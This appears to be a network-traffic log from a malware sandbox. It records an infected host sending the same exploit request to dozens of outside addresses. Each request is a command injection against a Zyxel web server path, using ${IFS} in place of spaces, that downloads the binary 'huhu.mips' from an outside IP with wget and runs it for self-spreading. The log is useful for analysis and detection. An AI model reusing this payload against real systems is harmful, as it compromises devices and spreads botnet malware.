                                                  Jan 19, 2024 18:24:07.290030956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7331192.168.2.1346684172.86.220.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290075064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7332192.168.2.133818070.120.92.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290117025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7333192.168.2.134249066.63.144.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290169001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7334192.168.2.1338092176.52.220.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290203094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7335192.168.2.134174631.23.141.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290271044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7336192.168.2.135125243.44.228.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290276051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7337192.168.2.134844297.234.253.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290348053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7338192.168.2.133530244.182.117.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290404081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7339192.168.2.1357472145.81.26.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290404081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7340192.168.2.133465846.210.8.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290549994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7341192.168.2.1359520129.31.137.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290559053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7342192.168.2.135022486.7.34.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290580034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7343192.168.2.1336230105.0.210.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290580034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7344192.168.2.133743238.183.192.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290590048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7345192.168.2.134550844.102.195.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290622950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7346192.168.2.1344864197.197.58.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290747881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7347192.168.2.133663069.229.8.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290831089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7348192.168.2.133980662.56.6.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290831089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7349192.168.2.133833438.66.148.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.290858030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7350192.168.2.1332878135.28.106.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291002035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7351192.168.2.134260063.111.37.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291002035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7352192.168.2.1347918163.47.45.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291028023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7353192.168.2.133758263.204.132.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291060925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7354192.168.2.134312085.217.7.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291076899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7355192.168.2.135462887.227.141.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291076899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7356192.168.2.1343990167.1.20.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291076899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7357192.168.2.135357050.109.128.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291110039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7358192.168.2.134776834.246.47.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291124105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7359192.168.2.1346284118.252.163.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291181087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7360192.168.2.135864068.196.45.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291181087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7361192.168.2.1347296162.174.112.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291248083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7362192.168.2.13401202.89.147.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291284084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7363192.168.2.1345228137.218.207.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291306019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7364192.168.2.1336680191.68.183.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291368961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7365192.168.2.1351004135.89.213.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291388035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7366192.168.2.1343996114.31.222.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291420937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7367192.168.2.1341432166.137.63.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291490078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7368192.168.2.1336840132.132.86.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291512012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7369192.168.2.133773414.102.57.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291544914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7370192.168.2.1353020103.89.250.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291610003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7371192.168.2.1333014220.160.162.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291646957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7372192.168.2.1336086164.156.73.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291688919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7373192.168.2.134225239.197.92.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291721106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7374192.168.2.135712471.40.136.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291770935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7375192.168.2.134196053.32.54.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291791916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7376192.168.2.1338114157.230.237.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291831017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7377192.168.2.1341746125.145.159.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291862965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7378192.168.2.1358874168.137.208.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291917086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7379192.168.2.135993213.198.99.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.291949034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7380192.168.2.1350650197.101.189.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.292001009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7381192.168.2.135074644.78.146.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.292045116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7382192.168.2.134761684.163.133.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.292087078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7383192.168.2.135705258.41.182.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.292120934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7384192.168.2.1346682102.92.162.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.292160988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7385192.168.2.1348838115.104.128.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.292190075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7386192.168.2.1349314157.195.198.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.292233944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7387192.168.2.1333176195.196.209.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.292857885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7388192.168.2.1344206193.67.125.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.294069052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7389192.168.2.135407496.196.26.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.294467926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7390192.168.2.1347642153.81.41.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.295201063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7391192.168.2.1354996101.37.245.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.295747995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7392192.168.2.1337002171.252.115.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.295774937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7393192.168.2.135829058.161.73.40443
                                                  TimestampBytes transferredDirectionData
